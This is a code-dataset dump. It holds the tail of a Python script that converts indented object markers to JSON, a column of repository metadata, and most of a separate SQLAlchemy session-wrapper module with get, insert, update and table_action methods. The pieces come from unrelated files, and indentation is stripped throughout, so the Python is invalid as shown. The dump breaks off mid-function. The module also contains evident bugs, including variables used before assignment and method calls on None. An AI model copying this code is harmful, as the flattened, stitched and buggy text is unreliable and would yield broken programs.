elif object_state_arr[-1] == 1:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": \" \", \n" )
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
else:
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": \" \", \n" )
if "<[]Object>" in i:
if present_space_count < past_space_count :
if object_state_arr[-1] == 0:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [{\n" )
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
object_state_arr.append(1)
elif object_state_arr[-1] == 1:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [{\n" )
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
object_state_arr.append(1)
else:
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [{\n" )
object_state_arr.append(1)
if "<Object>" in i:
if present_space_count < past_space_count :
if object_state_arr[-1] == 0:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": {\n" )
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
object_state_arr.append(0)
elif object_state_arr[-1] == 1:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": {\n" )
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
object_state_arr.append(0)
else:
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": {\n" )
object_state_arr.append(0)
past_space_count = present_space_count
function_write_data(object_state_arr, 2)
fw.write("} \n")
| 53.759259
| 155
| 0.60604
| 1,090
| 8,709
| 4.400917
| 0.065138
| 0.233479
| 0.230561
| 0.126954
| 0.88326
| 0.882843
| 0.85345
| 0.85345
| 0.85345
| 0.853033
| 0
| 0.011296
| 0.24779
| 8,709
| 161
| 156
| 54.093168
| 0.720959
| 0.026409
| 0
| 0.730435
| 0
| 0
| 0.085101
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017391
| false
| 0
| 0
| 0
| 0.026087
| 0.008696
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
72c2ce111f5ff74ca5701349c030f5fad18a0d83
| 71,043
|
py
|
Python
|
ganimides_server/ganimides_database/_database_class_session.py
|
leandrou-technology-forward/api_server
|
0a41335a45f179ba831799722dc049a98ed9c094
|
[
"MIT"
] | null | null | null |
ganimides_server/ganimides_database/_database_class_session.py
|
leandrou-technology-forward/api_server
|
0a41335a45f179ba831799722dc049a98ed9c094
|
[
"MIT"
] | 1
|
2021-06-02T00:31:50.000Z
|
2021-06-02T00:31:50.000Z
|
ganimides_server/ganimides_database/_database_class_session.py
|
leandrou-technology-forward/ganimides_api_server
|
8787927e2cf7568a070c1c65294ee76d89177908
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
if not (os.path.dirname(__file__) in sys.path): sys.path.append(os.path.dirname(__file__))
import datetime
import uuid
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql import text
#from sqlalchemy.engine import ddl
#from sqlalchemy import create_engine
#from sqlalchemy import MetaData
#from sqlalchemy import inspect
from _serverApp import thisApp
from _serverApp import get_debug_option_as_level,get_debug_files,get_debug_level,Fore
from _serverApp import log_process_message, log_process_result, log_process_data, log_process_input, log_process_result_message, log_message
from _serverApp import set_process_identity_dict, set_process_caller_area,get_globals_from_configuration
from _serverApp import add_methods_to_configuration, get_module_debug_level,retrieve_module_configuration
from _serverApp import build_process_signature, build_process_call_area
#from sqlalchemy.ext.declarative import declarative_base
#from _serverApp import thisApp
# from _database_class_session import leandroutechnologyforward_database_session_class as db_session_class
# from _database_class_table import leandroutechnologyforward_database_table_class as db_table_class
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
module_ProgramName = os.path.splitext(os.path.basename(__file__))[0]
module_id = '{}'.format(module_ProgramName)
module_version = 0.1
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# classes
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
class leandroutechnologyforward_database_session_class:
engine = None
session = None
schema = None
debug = False
session_id=None
def __init__(self, engine, session=None, schema_dictionary={},session_id=None,debug=None):
self.engine = engine
if not session:
Session = sessionmaker(bind=self.engine)
session = Session()
self.session = session
self.schema = schema_dictionary
self.session_id = session_id
self.debug = get_debug_option_as_level(debug)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# DB <--session--> sqlalchemy workspace
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def get(self, table_model, get_specification, output_method='', caller_area={}, **kwargs):
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', 'get')
print('')
if output_method.upper().find('DICT') >= 0 or output_method.upper().find('JSON') >= 0:
return self.get_table_row_as_dict(table_model, get_specification, caller_area=caller_area, **kwargs)
elif output_method.upper().find('HTML') >= 0:
return self.get_table_row_as_dict(table_model, get_specification, caller_area=caller_area, **kwargs)
else:
return self.get_table_row(table_model, get_specification, caller_area=caller_area, **kwargs)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def get_rows(self, table_model, get_specification, output_method='', caller_area={}, **kwargs):
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', 'get_rows')
print('')
if output_method.upper().find('DICT') >= 0 or output_method.upper().find('JSON') >= 0:
return self.get_table_rows_as_dict(table_model,get_specification, caller_area=caller_area, **kwargs)
elif output_method.upper().find('HTML') >= 0:
return self.get_table_rows_as_dict(table_model,get_specification, caller_area=caller_area, **kwargs)
else:
return self.get_table_rows(table_model, get_specification, caller_area=caller_area, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def get_list(self, table_model, get_specification, output_method='', caller_area={}, **kwargs):
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', 'list')
print('')
if output_method.upper().find('DICT') >= 0 or output_method.upper().find('JSON') >= 0:
return self.get_table_rows_as_dict(table_model,get_specification, caller_area=caller_area, **kwargs)
elif output_method.upper().find('HTML') >= 0:
return self.get_table_rows_as_dict(table_model,get_specification, caller_area=caller_area, **kwargs)
else:
return self.get_table_rows(table_model, get_specification, caller_area=caller_area, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def refresh(self, table_model, data_record, auto_commit=False, caller_area={}, **kwargs):
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', 'refresh')
print('')
return self.insert_or_update(table_model, data_record, auto_commit=auto_commit, caller_area=caller_area, **kwargs)
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# session support functions
# form DB --> sqlalchemy workspace
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def get_table_row(self, table_model, get_specification, caller_area={}, **kwargs):
_method_name = 'get_table_row'
_method_action = 'get'
_method_entity = table_model.__name__
_method_table=table_model.__tablename__
_method_msgID = set_msgID(_method_name, _method_action, _method_table)
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', _method_msgID)
print('')
_process_identity_kwargs = {'type': 'table', 'module': module_id, 'name': _method_name, 'action': _method_action, 'entity': _method_entity, 'msgID': _method_msgID,}
_process_adapters_kwargs = {'dbsession': self, 'table_model': table_model, 'table_name': table_model.__tablename__}
_process_log_kwargs = {'indent_method': 'CALL_LEVEL', 'indent_level':None}
_process_debug_level = get_debug_level(caller_area.get('debug_level'), **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_files = get_debug_files(_process_debug_level, **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_kwargs={'debug_level':_process_debug_level,'debug_files':_process_debug_files}
_process_signature = build_process_signature(**_process_identity_kwargs, **_process_adapters_kwargs, **_process_debug_kwargs, **_process_log_kwargs)
_process_call_area = build_process_call_area(_process_signature, caller_area)
log_process_input(_method_msgID, 'get_specification', get_specification, **_process_call_area)
log_process_input(_method_msgID, 'caller_area', caller_area, **_process_call_area)
filter_specification = self.smart_locate_expression(table_model, get_specification)
msg1=f"search filter:[[{filter_specification}]]"
query = self.build_query(table_model, filter_specification)
if not query:
msgx = f"query failed"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID,'error',msg,**_process_call_area)
return None
query_rows = query.count()
#str(query.count())
if not query_rows >= 1:
color = '' #'#RED#'
msgx = f"NOT-FOUND" #, {color}zero rows retrieved"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID,'warning',msg,**_process_call_area)
return None
current_record_obj = query.first()
color = '' #color = '' #color = '#GREEN#'
x=''
if query_rows > 1:
color = '' #'#RED#'
x = 's'
msgx = f"{color}OK, {query_rows} row{x} retrieved"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID, 'success', msg, **_process_call_area)
return current_record_obj
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def get_table_rows(self, table_model, get_specification, caller_area={}, **kwargs):
_method_name = 'get_table_rows'
_method_action = 'get_table_rows'
_method_entity = table_model.__name__
_method_table = table_model.__tablename__
_method_msgID = set_msgID(_method_name, _method_action, _method_table)
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', _method_msgID)
print('')
_process_identity_kwargs = {'type': 'table', 'module': module_id, 'name': _method_name, 'action': _method_action, 'entity': _method_entity, 'msgID': _method_msgID,}
_process_adapters_kwargs = {'dbsession': self, 'table_model': table_model, 'table_name': table_model.__tablename__}
_process_log_kwargs = {'indent_method': 'CALL_LEVEL', 'indent_level':None}
_process_debug_level = get_debug_level(caller_area.get('debug_level'), **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_files = get_debug_files(_process_debug_level, **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_kwargs={'debug_level':_process_debug_level,'debug_files':_process_debug_files}
_process_signature = build_process_signature(**_process_identity_kwargs, **_process_adapters_kwargs, **_process_debug_kwargs, **_process_log_kwargs)
_process_call_area = build_process_call_area(_process_signature, caller_area)
log_process_input(_method_msgID, 'get_specification', get_specification, **_process_call_area)
log_process_input(_method_msgID, 'caller_area', caller_area, **_process_call_area)
filter_specification = self.smart_locate_expression(table_model, get_specification)
msg1=f"search filter:[[{filter_specification}]]"
query = self.build_query(table_model, filter_specification)
if not query:
msgx = f"query failed"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID,'error',msg,**_process_call_area)
return None
query_rows = query.count()
if not query_rows >= 1:
color = '' #'#RED#'
msgx = f"NOT-FOUND" #, {color}zero rows retrieved"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID,'warning',msg,**_process_call_area)
return None
current_record_objects = query.all()
color = '' #color = '#GREEN#'
x=''
if query_rows > 1:
color = '' #'#RED#'
x = 's'
msgx = f"{color}OK, {query_rows} row{x} retrieved"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID,'success',msg,**_process_call_area)
return current_record_objects
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def insert_or_update(self, table_model, data_record, auto_commit=False, caller_area={}, **kwargs):
_method_name = 'insert_or_update'
_method_action = 'insert_or_update'
_method_entity = table_model.__name__
_method_table = table_model.__tablename__
_method_msgID = set_msgID(_method_name, _method_action, _method_table)
_process_identity_kwargs = {'type': 'table', 'module': module_id, 'name': _method_name, 'action': _method_action, 'entity': _method_entity, 'msgID': _method_msgID,}
_process_adapters_kwargs = {'dbsession': self, 'table_model': table_model, 'table_name': table_model.__tablename__}
_process_log_kwargs = {'indent_method': 'CALL_LEVEL', 'indent_level':None}
_process_debug_level = get_debug_level(caller_area.get('debug_level'), **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_files = get_debug_files(_process_debug_level, **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_kwargs={'debug_level':_process_debug_level,'debug_files':_process_debug_files}
_process_signature = build_process_signature(**_process_identity_kwargs, **_process_adapters_kwargs, **_process_debug_kwargs, **_process_log_kwargs)
_process_call_area = build_process_call_area(_process_signature, caller_area)
log_process_input(_method_msgID, 'auto_commit', auto_commit, **_process_call_area)
log_process_input(_method_msgID, 'data_record', data_record, **_process_call_area)
log_process_input(_method_msgID, 'caller_area', caller_area, **_process_call_area)
filter_specification = self.smart_locate_expression(table_model, data_record)
msg1=f"search filter:[[{filter_specification}]]"
query = self.build_query(table_model, filter_specification)
if not query:
msgx = f"query failed"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID,'error',msg,**_process_call_area)
return None
query_rows = query.count()
#str(query.count())
if not query_rows >= 1:
color = '' #'#RED#'
msgx = f"NOT-FOUND" #, {color}zero rows retrieved"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID,'warning',msg,**_process_call_area)
current_record_obj = None
else:
current_record_obj = query.first()
color = '' #color = '#GREEN#'
x=''
if query_rows > 1:
color = '' #'#RED#'
x = 's'
msgx = f"{color}OK, {query_rows} row{x} retrieved"
msg = msgx + " #C0#" + msg1
log_process_message(_method_msgID,'success',msg,**_process_call_area)
if not current_record_obj:
_method_action='ADD'
current_record_obj=table_model()
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
if changes:log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
(ok,messages) = current_record_obj.input_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} input validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': valid_fields_dictionary, 'messages':messages, 'rows_added':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return None
self.session.add(current_record_obj)
if auto_commit:
self.commit(**_process_call_area)
msg = f'OK. {table_model.__name__.upper()} added'
rows_added=1
else:
rows_added=0
msg = f'OK. {table_model.__name__.upper()} ready for addition'
current_record_dict = current_record_obj.to_dict()
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': current_record_dict, 'rows_added':rows_added,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return current_record_obj
else:
_method_action='UPDATE'
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
if changes:log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
if not current_record_obj.has_model_changed():
msg=f"OK. {table_model.__name__.upper()} is synchronized. no changes applied"
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': valid_fields_dictionary, 'rows_added':0,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return current_record_obj
(ok,messages) = current_record_obj.update_validation(valid_fields_dictionary)
if not ok:
msg=f'update validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': current_record_dict, 'messages':messages, 'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return None
self.session.add(current_record_obj)
if auto_commit:
try:
self.commit(**_process_call_area)
msg = f'OK. {table_model.__name__.upper()} updated'
rows_updated = 1
except Exception as error_text:
msg = f'{table_model.__name__.upper()} update failed:{error_text}'
rows_updated = 0
print(error_text)
else:
rows_updated=0
msg = f'OK. {table_model.__name__.upper()} ready for update'
current_record_dict = current_record_obj.to_dict()
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': current_record_dict, 'rows_added':0,'rows_updated':rows_updated, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return current_record_obj
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def insert(self, table_model, data_record, auto_commit=False, caller_area={}, **kwargs):
_method_name='insert'
_method_action='ADD'
_method_entity = table_model.__name__
_method_table = table_model.__tablename__
_method_msgID = set_msgID(_method_name, _method_action, _method_table)
_process_identity_kwargs = {'type': 'table', 'module': module_id, 'name': _method_name, 'action': _method_action, 'entity': _method_entity, 'msgID': _method_msgID,}
_process_adapters_kwargs = {'dbsession': self, 'table_model': table_model, 'table_name': table_model.__tablename__}
_process_log_kwargs = {'indent_method': 'CALL_LEVEL', 'indent_level':None}
_process_debug_level = get_debug_level(caller_area.get('debug_level'), **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_files = get_debug_files(_process_debug_level, **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_kwargs={'debug_level':_process_debug_level,'debug_files':_process_debug_files}
_process_signature = build_process_signature(**_process_identity_kwargs, **_process_adapters_kwargs, **_process_debug_kwargs, **_process_log_kwargs)
_process_call_area = build_process_call_area(_process_signature, caller_area)
log_process_input(_method_msgID, 'auto_commit', auto_commit, **_process_call_area)
log_process_input(_method_msgID, 'data_record', data_record, **_process_call_area)
log_process_input(_method_msgID, 'caller_area', caller_area, **_process_call_area)
messages=[]
filter_specification = self.smart_locate_expression2(table_model, data_record)
msg1=f"search filter:[[{filter_specification}]]"
query = self.build_query(table_model, filter_specification)
if not query:
msgx = f"query failed"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID,'error',msg,**_process_call_area)
return None
query_rows = query.count()
#str(query.count())
if not query_rows >= 1:
color = '' #color = '#GREEN#'
msgx = f"OK, not found"#, {color}zero rows retrieved"
msg = msgx + " #C0#" + msg1
log_process_message(_method_msgID,'success',msg,**_process_call_area)
current_record_obj = None
else:
current_record_obj = query.first()
color = '' #'#RED#'
x=''
if query_rows > 1:
color = '' #'#RED#'
x = 's'
msgx = f"{color}{query_rows} row{x} retrieved"
msg = msgx + " #C0#" + msg1
log_process_message(_method_msgID,'warning',msg,**_process_call_area)
if current_record_obj:
current_record_dict = current_record_obj.to_dict()
msg=f'[{table_model.__name__.upper()}] already exists. filter: [[{filter_specification}]]'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': current_record_dict, 'messages':messages, 'rows_added':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return None
_method_action='ADD'
current_record_obj=table_model()
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
if changes:log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
(ok,messages) = current_record_obj.input_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} input validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': valid_fields_dictionary, 'messages':messages, 'rows_added':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return None
self.session.add(current_record_obj)
if auto_commit:
self.commit(**_process_call_area)
msg = f'OK. {table_model.__name__.upper()} added committed'
rows_added=1
else:
rows_added=1
msg = f'OK. {table_model.__name__.upper()} added not committed'
current_record_dict = current_record_obj.to_dict()
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': current_record_dict, 'rows_added':rows_added,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return current_record_obj
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def update(self, table_model, data_record, update_filter={}, auto_commit=False, caller_area={}, **kwargs):
_method_name='update'
_method_action = 'UPDATE'
_method_entity = table_model.__name__
_method_table = table_model.__tablename__
_method_msgID = set_msgID(_method_name, _method_action, _method_table)
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', _method_msgID)
print('')
_process_identity_kwargs = {'type': 'table', 'module': module_id, 'name': _method_name, 'action': _method_action, 'entity': _method_entity, 'msgID': _method_msgID,}
_process_adapters_kwargs = {'dbsession': self, 'table_model': table_model, 'table_name': table_model.__tablename__}
_process_log_kwargs = {'indent_method': 'CALL_LEVEL', 'indent_level':None}
_process_debug_level = get_debug_level(caller_area.get('debug_level'), **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_files = get_debug_files(_process_debug_level, **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_kwargs={'debug_level':_process_debug_level,'debug_files':_process_debug_files}
_process_signature = build_process_signature(**_process_identity_kwargs, **_process_adapters_kwargs, **_process_debug_kwargs, **_process_log_kwargs)
_process_call_area = build_process_call_area(_process_signature, caller_area)
log_process_input(_method_msgID, 'auto_commit', auto_commit, **_process_call_area)
log_process_input(_method_msgID, 'data_record', data_record, **_process_call_area)
log_process_input(_method_msgID, 'caller_area', caller_area, **_process_call_area)
messages=[]
# record filter expression
if update_filter:
locate_dict = {**update_filter}
else:
locate_dict = {**data_record}
# # locate record
# locate_dict = {**update_filter, **data_record}
filter_specification = self.smart_locate_expression(table_model, locate_dict)
msg1=f"search filter:[[{filter_specification}]]"
query = self.build_query(table_model, filter_specification)
if not query:
msgx = f"query failed"
msg = msgx + " #C0#" + msg1
log_process_result_message(_method_msgID,'error',msg,**_process_call_area)
return None
query_rows = query.count()
#str(query.count())
if not query_rows >= 1:
color = '' #'#RED#'
msgx = f"NOT-FOUND" #, {color}zero rows retrieved"
msg = msgx + " #C0#" + msg1
log_process_message(_method_msgID,'warning',msg,**_process_call_area)
current_record_obj = None
else:
current_record_obj = query.first()
color = '' #color = '#GREEN#'
msgType='success'
x=''
if query_rows > 1:
msgType='warning'
color = '' #'#RED#'
x = 's'
msgx = f"{color}OK, {query_rows} row{x} retrieved"
msg = msgx + " #C0#" + msg1
log_process_message(_method_msgID,msgType,msg,**_process_call_area)
if not current_record_obj:
current_record_dict = current_record_obj.to_dict()
msg=f'[{table_model.__name__.upper()}] not exists. filter: [[{filter_specification}]]'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': data_record, 'messages':messages, 'rows_added':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return None
valid_fields_dictionary = current_record_obj.valid_model_fields_dictionary(data_record)
changes = self.update_from_dict(current_record_obj, **valid_fields_dictionary)
if changes:log_process_data(_method_msgID, 'record changes', changes, **_process_call_area)
if not current_record_obj.has_model_changed():
msg=f"OK. {table_model.__name__.upper()} is synchronized. no changes applied"
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': valid_fields_dictionary, 'rows_added':0,'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return current_record_obj
(ok,messages) = current_record_obj.update_validation(valid_fields_dictionary)
if not ok:
msg=f'{_method_entity.upper()} update validation errors'
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': current_record_dict, 'messages':messages, 'rows_updated':0, 'api_action': _method_action.upper(), 'api_name':_method_name }
log_process_result(_method_msgID,api_result,**_process_call_area)
return None
self.session.add(current_record_obj)
if auto_commit:
self.commit(**_process_call_area)
msg = f'OK. {table_model.__name__.upper()} updated committed'
rows_updated=1
else:
rows_updated=1
msg = f'OK. {table_model.__name__.upper()} updated not committed'
current_record_dict = current_record_obj.to_dict()
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': current_record_dict, 'rows_added':0,'rows_updated':rows_updated, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return current_record_obj
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def table_action(self, table_model, action, data_record, action_filter={}, auto_commit=False, caller_area={}, **kwargs):
_method_name = 'table_action'
_method_action = action
_method_entity = table_model.__name__
_method_table = table_model.__tablename__
_method_msgID = set_msgID(_method_name, _method_action, _method_table)+' #XBLUE#'+_method_action.upper()+'#C0#'
if not caller_area:
print('')
print(f'{Fore.RED}ooooooooo NO CALLER AREA', _method_msgID)
print('')
_process_identity_kwargs = {'type': 'table', 'module': module_id, 'name': _method_name, 'action': _method_action, 'entity': _method_entity, 'msgID': _method_msgID,}
_process_adapters_kwargs = {'dbsession': self, 'table_model': table_model, 'table_name': table_model.__tablename__}
_process_log_kwargs = {'indent_method': 'CALL_LEVEL', 'indent_level':None}
_process_debug_level = get_debug_level(caller_area.get('debug_level'), **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_files = get_debug_files(_process_debug_level, **_process_identity_kwargs, **_process_adapters_kwargs)
_process_debug_kwargs={'debug_level':_process_debug_level,'debug_files':_process_debug_files}
_process_signature = build_process_signature(**_process_identity_kwargs, **_process_adapters_kwargs, **_process_debug_kwargs, **_process_log_kwargs)
_process_call_area = build_process_call_area(_process_signature, caller_area)
msg=f'#C0#action=#BLUE#{action.upper()}#C0#'
log_process_message(_method_msgID, '', msg, **_process_call_area)
log_process_input(_method_msgID, 'auto_commit', auto_commit, **_process_call_area)
log_process_input(_method_msgID, 'data_record', data_record,**_process_call_area)
log_process_input(_method_msgID, 'action_filter', action_filter,**_process_call_area)
log_process_input(_method_msgID, 'caller_area', caller_area,**_process_call_area)
row_count = 0
rows_updated = 0
action = action.replace('_', '-')
actions_supported = ('ADD', 'UPDATE', 'UPDATE-ROWS', 'REFRESH', 'REGISTER', 'UNREGISTER', 'DELETE', 'REMOVE', 'ACTIVATE', 'DEACTIVATE', 'CONFIRM', 'INQUIRY', 'LIST', 'GET')
if action.upper() not in actions_supported:
msg = f"action '{action}' not supported. {actions_supported}"
api_result = {'api_status': 'error', 'api_message': msg, 'api_data': actions_supported, 'row_count':row_count,'rows_updated':rows_updated, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
now = datetime.datetime.utcnow()
# record filter expression
if action_filter:
locate_dict = {**action_filter}
else:
locate_dict = {**data_record}
if action.upper() in ('LIST'):
# locate_dict = {**action_filter, **data_record}
records_dict = self.get_table_rows_as_dict(table_model, locate_dict, caller_area=_process_call_area, **kwargs)
row_count = len(records_dict)
msg = f"OK. {row_count} {_method_entity.upper()} rows retrieved"
api_result = {'api_status': 'success', 'api_message': msg, 'api_data': records_dict, 'api_data_rows': row_count, 'api_action': _method_action.upper(), 'api_name': _method_name}
log_process_result(_method_msgID,api_result,**_process_call_area)
return api_result
elif action.upper()=='UPDATE-ROWS':
locate_dict = {**action_filter}
records = self.get_table_rows(table_model, action_filter, caller_area=_process_call_area, **kwargs)
if not records:
records={}
row_count = len(records)
msg = f"OK. {row_count} {_method_entity.upper()} rows retrieved"
if len(records) <= 0:
